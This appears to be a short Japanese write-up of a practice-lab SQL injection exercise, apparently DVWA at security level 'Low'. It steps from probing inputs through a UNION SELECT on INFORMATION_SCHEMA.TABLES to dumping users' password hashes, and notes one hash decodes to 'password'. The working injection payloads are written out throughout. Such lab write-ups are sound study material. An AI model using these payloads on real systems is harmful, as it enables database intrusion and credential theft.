Hey guys!
セキュリティレベル『Low』で実行。
まずは、ソースコードを確認。
『1』と入力して動作を確認。
まずは、『1'』だとエラー。
『1' or 1=1』でもエラー。
『1' or 1=1 #』だとなにか情報が出てきた。
#を追加することで、#以降の文字をコメント処理させてみた。
『1' or 1=1 union SELECT null,table_name FROM INFORMATION_SCHEMA.TABLES#』でテーブルを取得。
どうやらusersテーブルがあるようなので
『1' or 1=1 union select user,password from users #』でパスワードを表示。
パスワードのハッシュ値を複合すると『password』で、ビンゴ!
Best regards,